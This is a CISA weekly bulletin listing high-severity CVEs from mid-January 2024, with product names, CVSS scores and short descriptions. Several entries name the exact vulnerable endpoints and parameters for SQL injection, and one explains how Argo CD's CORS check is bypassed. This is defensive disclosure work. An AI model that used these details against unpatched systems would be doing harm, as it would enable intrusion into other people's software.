Vulnerability Summary for the Week of January 15, 2024

Released
Jan 22, 2024
Document ID
SB24-022

The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores.

Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High: vulnerabilities with a CVSS base score of 7.0–10.0
  • Medium: vulnerabilities with a CVSS base score of 4.0–6.9
  • Low: vulnerabilities with a CVSS base score of 0.0–3.9

Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis. 


High Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
argoproj -- argo-cdArgo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15 are vulnerable to a cross-server request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim's behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the "Lax" SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain. If an attacker can place malicious code on, for example, https://test.internal.example.com/, they can still perform a CSRF attack. In this case, the "Lax" SameSite cookie does not prevent the browser from sending the auth cookie, because the destination is a parent domain of the Argo CD API. Browsers generally block such attacks by applying CORS policies to sensitive requests with sensitive content types. Specifically, browsers will send a "preflight request" for POSTs with content type "application/json" asking the destination API "are you allowed to accept requests from my domain?" If the destination API does not answer "yes," the browser will block the request. Before the patched versions, Argo CD did not validate that requests contained the correct content type header. So an attacker could bypass the browser's CORS check by setting the content type to something which is considered "not sensitive" such as "text/plain." The browser wouldn't send the preflight request, and Argo CD would happily accept the contents (which are actually still JSON) and perform the requested action (such as running malicious code). A patch for this vulnerability has been released in the following Argo CD versions: 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15. The patch contains a breaking API change. The Argo CD API will no longer accept non-GET requests which do not specify application/json as their Content-Type. The accepted content types list is configurable, and it is possible (but discouraged) to disable the content type check completely. Users are advised to upgrade. There are no known workarounds for this vulnerability.2024-01-198.3CVE-2024-22424
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
asus -- armoury_crateASUS Armoury Crate has a vulnerability in arbitrary file write and allows remote attackers to access or modify arbitrary files by sending specific HTTP requests without permission.2024-01-199.8CVE-2023-5716
twcert@cert.org.tw
atril -- atrilAtril is a simple multi-page document viewer. Atril is vulnerable to a critical Command Injection Vulnerability. This vulnerability gives the attacker immediate access to the target system when the target user opens a crafted document or clicks on a crafted link/URL using a maliciously crafted CBT document which is a TAR archive. A patch is available at commit ce41df6.2024-01-129.6CVE-2023-51698
security-advisories@github.com
security-advisories@github.com
aveva -- pi_serverAVEVA PI Server versions 2023 and 2018 SP3 P05 and prior contain a vulnerability that could allow an unauthenticated user to remotely crash the PI Message Subsystem of a PI Server, resulting in a denial-of-service condition.2024-01-187.5CVE-2023-34348
ics-cert@hq.dhs.gov
avo-hq -- avoAvo is a framework to create admin panels for Ruby on Rails apps. A stored cross-site scripting (XSS) vulnerability was found in the key_value field of Avo v3.2.3 and v2.46.0. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser. The value of the key_value is inserted directly into the HTML code. In the current version of Avo (possibly also older versions), the value is not properly sanitized before it is inserted into the HTML code. This vulnerability could be used to steal sensitive information from victims that could be used to hijack victims' accounts or redirect them to malicious websites. Avo 3.2.4 and 2.47.0 include a fix for this issue. Users are advised to upgrade.2024-01-167.3CVE-2024-22191
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
beijing_baichuo -- smart_s150_management_platformA vulnerability was found in Beijing Baichuo Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-197.3CVE-2024-0712
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes -- simple_student_information_systemA vulnerability was found in Campcodes Student Information System 1.0. It has been classified as critical. Affected is an unknown function of the file /classes/Users.php?f=save. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250602 is the identifier assigned to this vulnerability.2024-01-139.8CVE-2024-0497
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes -- supplier_management_systemComplete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_category.php?id=.2024-01-167.2CVE-2024-22625
cve@mitre.org
campcodes -- supplier_management_systemComplete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_retailer.php?id=.2024-01-167.2CVE-2024-22626
cve@mitre.org
campcodes -- supplier_management_systemComplete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_distributor.php?id=.2024-01-167.2CVE-2024-22627
cve@mitre.org
cires21 -- c21_live_encoder_and_live_mosaicUnrestricted upload of dangerous file types in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to upload different file extensions without any restrictions, resulting in a full system compromise.2024-01-1710CVE-2024-0643
cve-coordination@incibe.es
cires21 -- c21_live_encoder_and_live_mosaicInadequate access control in the C21 Live Encoder and Live Mosaic product, version 5.3. This vulnerability allows a remote attacker to access the application as an administrator user through the application endpoint, due to lack of proper credential management.2024-01-179.8CVE-2024-0642
cve-coordination@incibe.es
cisco -- unity_connectionA vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system and execute commands on the underlying operating system. This vulnerability is due to a lack of authentication in a specific API and improper validation of user-supplied data. An attacker could exploit this vulnerability by uploading arbitrary files to an affected system. A successful exploit could allow the attacker to store malicious files on the system, execute arbitrary commands on the operating system, and elevate privileges to root.2024-01-177.3CVE-2024-20272
ykramarz@cisco.com
cloud_software_group -- netscaler_adcImproper Restriction of Operations within the Bounds of a Memory Buffer in NetScaler ADC and NetScaler Gateway allows Unauthenticated Denial of Service2024-01-178.2CVE-2023-6549
secure@citrix.com
code-projects -- dormitory_management_systemA vulnerability was found in code-projects Dormitory Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file modifyuser.php. The manipulation of the argument mname leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-250577 was assigned to this vulnerability.2024-01-127.5CVE-2024-0472
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cxbsoft -- post-officeA vulnerability, which was classified as critical, was found in CXBSoft Post-Office 1.0. Affected is an unknown function of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250698 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0528
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cxbsoft -- post-officeA vulnerability has been found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /apps/login_auth.php of the component HTTP POST Request Handler. The manipulation of the argument username_login leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250699. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0529
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cxbsoft -- post-officeA vulnerability was found in CXBSoft Post-Office up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /apps/reg_go.php of the component HTTP POST Request Handler. The manipulation of the argument username_reg leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250700. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0530
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cxbsoft -- url-shortingA vulnerability was found in CXBSoft Url-shorting up to 1.3.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php. The manipulation of the argument url leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250694 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0524
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cxbsoft -- url-shortingA vulnerability classified as critical has been found in CXBSoft Url-shorting up to 1.3.1. This affects an unknown part of the file /pages/long_s_short.php of the component HTTP POST Request Handler. The manipulation of the argument longurl leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250695. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0525
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cxbsoft -- url-shortingA vulnerability classified as critical was found in CXBSoft Url-shorting up to 1.3.1. This vulnerability affects unknown code of the file /pages/short_to_long.php of the component HTTP POST Request Handler. The manipulation of the argument shorturl leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250696. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0526
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cxbsoft -- url-shortingA vulnerability, which was classified as critical, has been found in CXBSoft Url-shorting up to 1.3.1. This issue affects some unknown processing of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250697 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0527
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
datahub-project -- datahubDataHub is an open-source metadata platform. In affected versions a low privileged user could remove a user, edit group members, or edit another user's profile information. The default privileges gave too many broad permissions to low privileged users. These have been constrained in PR #9067 to prevent abuse. This issue can result in privilege escalation for lower privileged users up to admin privileges, potentially, if a group with admin privileges exists. May not impact instances that have modified default privileges. This issue has been addressed in datahub version 0.12.1. Users are advised to upgrade.2024-01-167.5CVE-2024-22409
security-advisories@github.com
security-advisories@github.com
dell -- idrac_service_module_(ism)Dell iDRAC Service Module, versions 5.2.0.0 and prior, contain an Incorrect Default Permissions vulnerability. It may allow a local unprivileged user to escalate privileges and execute arbitrary code on the affected system. Dell recommends customers upgrade at the earliest opportunity.2024-01-167CVE-2024-22428
security_alert@emc.com
delta_electronics -- ispsoftA heap buffer-overflow exists in Delta Electronics ISPSoft. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DVP file to achieve code execution.2024-01-188.2CVE-2023-5131
disclosures@exodusintel.com
delta_electronics -- wplsoftA buffer overflow vulnerability exists in Delta Electronics WPLSoft. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DVP file to achieve code execution.2024-01-188.2CVE-2023-5130
disclosures@exodusintel.com
deltaww -- dopsoftA buffer overflow vulnerability exists in Delta Electronics Delta Industrial Automation DOPSoft version 2 when parsing the wScreenDESCTextLen field of a DPS file. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve code execution.2024-01-187.8CVE-2023-43815
disclosures@exodusintel.com
deltaww -- dopsoftA buffer overflow vulnerability exists in Delta Electronics Delta Industrial Automation DOPSoft version 2 when parsing the wKPFStringLen field of a DPS file. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve code execution.2024-01-187.8CVE-2023-43816
disclosures@exodusintel.com
deltaww -- dopsoftA buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft version 2 when parsing the wMailContentLen field of a DPS file. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve code execution.2024-01-187.8CVE-2023-43817
disclosures@exodusintel.com
deltaww -- dopsoftA buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.2024-01-187.8CVE-2023-43818
disclosures@exodusintel.com
deltaww -- dopsoftA stack based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the InitialMacroLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.2024-01-187.8CVE-2023-43819
disclosures@exodusintel.com
deltaww -- dopsoftA stack based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the wLogTitlesPrevValueLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.2024-01-187.8CVE-2023-43820
disclosures@exodusintel.com
deltaww -- dopsoftA stack based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the wLogTitlesActionLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.2024-01-187.8CVE-2023-43821
disclosures@exodusintel.com
deltaww -- dopsoftA stack based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the wLogTitlesTimeLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.2024-01-187.8CVE-2023-43822
disclosures@exodusintel.com
deltaww -- dopsoftA stack based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the wTTitleLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.2024-01-187.8CVE-2023-43823
disclosures@exodusintel.com
deltaww -- dopsoftA stack based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the wTitleTextLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.2024-01-187.8CVE-2023-43824
disclosures@exodusintel.com
demomentsomtres -- export_posts_with_imagesThe DeMomentSomTres WordPress Export Posts With Images WordPress plugin through 20220825 does not check authorization of requests to export the blog data, allowing any logged in user, such as subscribers to export the contents of the blog, including restricted and unpublished posts, as well as passwords of protected posts.2024-01-158.1CVE-2023-5905
contact@wpscan.com
dormitory_management_system -- dormitory_management_systemA vulnerability classified as critical has been found in code-projects Dormitory Management System 1.0. Affected is an unknown function of the file comment.php. The manipulation of the argument com leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250578 is the identifier assigned to this vulnerability.2024-01-129.8CVE-2024-0473
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
dormitory_management_system -- dormitory_management_systemA vulnerability classified as critical was found in code-projects Dormitory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250579.2024-01-129.8CVE-2024-0474
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
dormitory_management_system -- dormitory_management_systemA vulnerability, which was classified as critical, has been found in code-projects Dormitory Management System 1.0. Affected by this issue is some unknown functionality of the file modifyuser.php. The manipulation of the argument user_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250580.2024-01-139.8CVE-2024-0475
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
employee_profile_management_system -- employee_profile_management_systemA vulnerability, which was classified as critical, has been found in code-projects Employee Profile Management System 1.0. This issue affects some unknown processing of the file file_table.php. The manipulation of the argument per_id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250571.2024-01-129.8CVE-2024-0466
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
estatik -- estatikThe Estatik Real Estate Plugin WordPress plugin before 4.1.1 unserializes user input via some of its cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget chain is present on the blog2024-01-159.8CVE-2023-6049
contact@wpscan.com
evershop -- evershopAn issue was discovered in NPM's package @evershop/evershop before version 1.0.0-rc.8. The HMAC secret used for generating tokens is hardcoded as "secret". A weak HMAC secret poses a risk because attackers can use the predictable secret to create valid JSON Web Tokens (JWTs), allowing them access to important information and actions within the application.2024-01-139.1CVE-2023-46943
cve@mitre.org
evershop -- evershopLack of authentication in NPM's package @evershop/evershop before version 1.0.0-rc.8, allows remote attackers to obtain sensitive information via improper authorization in GraphQL endpoints.2024-01-137.5CVE-2023-46942
cve@mitre.org
cve@mitre.org
explorerplusplus -- explorer++.exeBuffer overflow vulnerability in Explorer++ affecting version 1.3.5.531. A local attacker could execute arbitrary code via a long filename argument by monitoring Structured Exception Handler (SEH) records.2024-01-177.3CVE-2024-0645
cve-coordination@incibe.es
faculty_management_system -- faculty_management_systemA vulnerability was found in code-projects Faculty Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/student-print.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250565 was assigned to this vulnerability.2024-01-129.8CVE-2024-0460
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fighting_c***_information_system -- fighting_c***_information_systemA vulnerability has been found in code-projects Fighting C*** Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/new-father.php. The manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250573 was assigned to this vulnerability.2024-01-129.8CVE-2024-0468
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fighting_c***_information_system -- fighting_c***_information_systemA vulnerability has been found in code-projects Fighting C*** Information System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/action/update-deworm.php. The manipulation of the argument usage_deworm leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250582 is the identifier assigned to this vulnerability.2024-01-139.8CVE-2024-0477
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fighting_c***_information_system -- fighting_c***_information_systemA vulnerability was found in code-projects Fighting C***k Information System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/edit_chicken.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250583.2024-01-139.8CVE-2024-0478
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fighting_c***_information_system -- fighting_c***_information_systemA vulnerability, which was classified as critical, has been found in code-projects Fighting C*** Information System 1.0. This issue affects some unknown processing of the file admin/action/update_mother.php. The manipulation of the argument age_mother leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250589 was assigned to this vulnerability.2024-01-139.8CVE-2024-0484
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fighting_c***_information_system -- fighting_c***_information_systemA vulnerability, which was classified as critical, was found in code-projects Fighting C*** Information System 1.0. Affected is an unknown function of the file admin/pages/tables/add_con.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250590 is the identifier assigned to this vulnerability.2024-01-139.8CVE-2024-0485
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fighting_c***_information_system -- fighting_c***_information_systemA vulnerability has been found in code-projects Fighting C*** Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/add_con.php. The manipulation of the argument chicken leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250591.2024-01-139.8CVE-2024-0486
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fighting_c***_information_system -- fighting_c***_information_systemA vulnerability was found in code-projects Fighting C*** Information System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/action/delete-vaccine.php. The manipulation of the argument ref leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250592.2024-01-139.8CVE-2024-0487
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fighting_c***_information_system -- fighting_c***_information_systemA vulnerability was found in code-projects Fighting C*** Information System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/action/new-feed.php. The manipulation of the argument type_feed leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250593 was assigned to this vulnerability.2024-01-139.8CVE-2024-0488
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fighting_c***_information_system -- fighting_c***_information_systemA vulnerability was found in code-projects Fighting C*** Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/action/edit_chicken.php. The manipulation of the argument ref leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250594 is the identifier assigned to this vulnerability.2024-01-139.8CVE-2024-0489
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
fireeye -- central_managementRemote file inclusion vulnerability in FireEye Central Management affecting version 9.1.1.956704. This vulnerability allows an attacker to upload a malicious PDF file to the system during the report creation process.2024-01-157.8CVE-2024-0315
cve-coordination@incibe.es
fireeye -- endpoint_securityImproper cleanup vulnerability in exceptions thrown in FireEye Endpoint Security, affecting version 5.2.0.958244. This vulnerability could allow an attacker to send multiple request packets to the containment_notify/preview parameter, which could lead to a service outage.2024-01-157.5CVE-2024-0316
cve-coordination@incibe.es
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/score/del.2024-01-188.8CVE-2024-22568
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/user/group_save.2024-01-188.8CVE-2024-22591
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/user/group_update2024-01-188.8CVE-2024-22592
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/admin/add_group_save2024-01-188.8CVE-2024-22593
cve@mitre.org
full_compass_systems -- wic1200A Weak Cryptography for Passwords vulnerability has been detected on WIC200 affecting version 1.1. This vulnerability allows a remote user to intercept the traffic and retrieve the credentials from another user and decode it in base64 allowing the attacker to see the credentials in plain text.2024-01-167.1CVE-2024-0556
cve-coordination@incibe.es
fuyanglipengjun -- wetong_mallA vulnerability was found in Weitong Mall 1.0.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file platform-shop\src\main\resources\com\platform\dao\OrderDao.xml. The manipulation of the argument sidx/order leads to sql injection. The associated identifier of this vulnerability is VDB-250243.2024-01-129.8CVE-2022-4961
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
github -- enterprise_serverAn unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. This vulnerability was reported via the GitHub Bug Bounty program.2024-01-167.2CVE-2024-0200
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
gitlab -- gitlabIncorrect authorization checks in GitLab CE/EE from all versions starting from 8.13 before 16.5.6, all versions starting from 16.6 before 16.6.4, all versions starting from 16.7 before 16.7.2, allows a user to abuse slack/mattermost integrations to execute slash commands as another user.2024-01-128.8CVE-2023-5356
cve@gitlab.com
cve@gitlab.com
gitlab -- gitlabAn issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.2024-01-127.5CVE-2023-7028
cve@gitlab.com
cve@gitlab.com
cve@gitlab.com
gl-inet -- gl-ax1800_firmwareAn issue was discovered on GL.iNet devices before version 4.5.0. There is an NGINX authentication bypass via Lua string pattern matching. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7.2024-01-129.8CVE-2023-50919
cve@mitre.org
go_git -- go_gitA denial of service (DoS) vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to perform denial of service attacks by providing specially crafted responses from a Git server which triggers resource exhaustion in go-git clients. Applications using only the in-memory filesystem supported by go-git are not affected by this vulnerability. This is a go-git implementation issue and does not affect the upstream git cli.2024-01-127.5CVE-2023-49568
cve-requests@bitdefender.com
go_git-- go_gitA path traversal vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to create and amend files across the filesystem. In the worse case scenario, remote code execution could be achieved. Applications are only affected if they are using the ChrootOS https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#ChrootOS , which is the default when using "Plain" versions of Open and Clone funcs (e.g. PlainClone). Applications using BoundOS https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#BoundOS or in-memory filesystems are not affected by this issue. This is a go-git implementation issue and does not affect the upstream cli.2024-01-129.8CVE-2023-49569
cve-requests@bitdefender.com
hancom -- hcellBuffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Hancom HCell on Windows allows Overflow Buffers.This issue affects HCell: 12.0.0.893.2024-01-128.8CVE-2023-40250
vuln@krcert.or.kr
haokekeji -- yiqiniuA vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function http_post of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250652.2024-01-137.3CVE-2024-0510
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
hecheng -- leadshopA vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability.2024-01-197.3CVE-2024-0739
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
hongdian -- h8951-4g-esp_firmwareRoot user password is hardcoded into the device and cannot be changed in the user interface.2024-01-129.8CVE-2023-49253
cvd@cert.pl
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareThe router console is accessible without authentication at "data" field, and while a user needs to be logged in in order to modify the configuration, the session state is shared. If any other user is currently logged in, the anonymous user can execute commands in the context of the authenticated one. If the logged in user has administrative privileges, it is possible to use webadmin service configuration commands to create a new admin user with a chosen password.2024-01-129.8CVE-2023-49255
cvd@cert.pl
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareThe authentication mechanism can be bypassed by overflowing the value of the Cookie "authentication" field, provided there is an active user session.2024-01-129.8CVE-2023-49262
cvd@cert.pl
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareAuthenticated user can execute arbitrary commands in the context of the root user by providing payload in the "destination" field of the network test tools. This is similar to the vulnerability CVE-2021-28151 mitigated on the user interface level by blacklisting characters with JavaScript, however, it can still be exploited by sending POST requests directly.2024-01-128.8CVE-2023-49254
cvd@cert.pl
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareAn authenticated user is able to upload an arbitrary CGI-compatible file using the certificate upload utility and execute it with the root user privileges.2024-01-128.8CVE-2023-49257
cvd@cert.pl
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareIt is possible to download the configuration backup without authorization and decrypt included passwords using hardcoded static key.2024-01-127.5CVE-2023-49256
cvd@cert.pl
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareThe authentication cookies are generated using an algorithm based on the username, hardcoded secret and the up-time, and can be guessed in a reasonable time.2024-01-127.5CVE-2023-49259
cvd@cert.pl
cvd@cert.pl
hongdian -- h8951-4g-esp_firmwareThe "tokenKey" value used in user authorization is visible in the HTML source of the login page.2024-01-127.5CVE-2023-49261
cvd@cert.pl
cvd@cert.pl
horner_automation -- cscapeIn Horner Automation Cscape versions 9.90 SP10 and prior, local attackers are able to exploit this vulnerability if a user opens a malicious CSP file, which would result in execution of arbitrary code on affected installations of Cscape.2024-01-157.8CVE-2023-7206
ics-cert@hq.dhs.gov
ics-cert@hq.dhs.gov
huawei -- emuiComponent exposure vulnerability in the Wi-Fi module. Successful exploitation of this vulnerability may affect service availability and integrity.2024-01-169.1CVE-2023-52101
psirt@huawei.com
psirt@huawei.com
huawei -- emuiBuffer overflow vulnerability in the FLP module. Successful exploitation of this vulnerability may cause out-of-bounds read.2024-01-169.8CVE-2023-52103
psirt@huawei.com
psirt@huawei.com
huawei -- emuiOut-of-bounds access vulnerability in the device authentication module. Successful exploitation of this vulnerability may affect confidentiality.2024-01-167.5CVE-2023-44112
psirt@huawei.com
psirt@huawei.com
huawei -- emuiVulnerability of trust relationships being inaccurate in distributed scenarios. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-44117
psirt@huawei.com
psirt@huawei.com
huawei -- emuiVulnerability of trust relationships being inaccurate in distributed scenarios. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-4566
psirt@huawei.com
psirt@huawei.com
